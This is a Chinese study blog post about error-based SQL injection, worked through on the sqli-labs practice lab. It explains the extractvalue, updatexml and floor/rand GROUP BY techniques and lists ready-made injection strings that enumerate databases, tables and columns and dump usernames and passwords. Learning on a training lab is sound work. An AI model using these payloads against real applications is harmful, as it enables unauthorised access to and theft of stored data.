前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >报错注入学习[通俗易懂]

报错注入学习[通俗易懂]

作者头像
全栈程序员站长
发布2022-11-10 13:50:05
4610
发布2022-11-10 13:50:05
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

复习完sqlilabs 1-4关 熟悉了简单sql注入的payload,不用反复看wp的payload,学到了可以

0x5c:/ %23:# %20: (空格) 0x7e=~

代码语言:javascript
复制
-1') union select 1,(select group_concat(username,0x5c,password) from users),3 %23

遇到第五关报错注入

学习文章1 学习文章2

SQL 报错注入详解

学习笔记:

报错注入原理:报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。

xpath语法报错

使用条件:mysql版本>5.1.5

extractvalue函数:

extractvalue(xml_document,Xpath_string);

Xpath_string是要求符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里,因此可以利用。(不满足xpath语法的字符串有~,#,$等等)

代码语言:javascript
复制
id='and(select extractvalue("anything",concat('~',(select语句))))
代码语言:javascript
复制
查数据库名:id='and(select extractvalue(1,concat(0x7e,(select database()))))
爆表名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))
爆字段名:id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))
爆数据:id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

extractvalue()能查询字符串的最大长度为32,如果我们想要的结果超过32,就要用substring()函数截取或limit分页,一次查看最多32位

注:version()=@@version

updatexml函数:

updatexml(xml_document,xpath_string,new_value)

new_value是string格式,替换查找到的负荷条件的数据 作用:改变文档中符合条件的节点的值

代码语言:javascript
复制
爆数据库名:'and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名:'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名:'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据:'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

concat+rand()+group_by()导致主键重复报错

这种报错方法的本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。

代码语言:javascript
复制
爆数据库名:' union select 1,count(*),concat(floor(rand(0)*2),database())x from `users` group by x %23
爆表名:' union select 1,count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))x from `users` group by x %23
爆列名:' union select 1,count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name="TABLE_NAME" limit 0,1))x from `users` group by x %23
爆数据:' union select 1,count(*),concat(floor(rand(0)*2),(select COLUMN_NAME from TABLE_NAME limit 0,1))x from `users` group by x %23

下面对sqlilabs Less-1进行测试

extractvalue函数:

报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]

这里因为能显示的最长长度为32,所以用substr来截取,这里用不来limit分页

报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]

updatexml函数:

报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]

floor报错:

报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
报错注入学习[通俗易懂]
代码语言:javascript
复制
' union select 1,2,3 from (select count(*),concat(floor(rand(0)*2),database())x from `users` group by x)a %23

这个是另一种payload

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月29日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • xpath语法报错
  • concat+rand()+group_by()导致主键重复报错
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档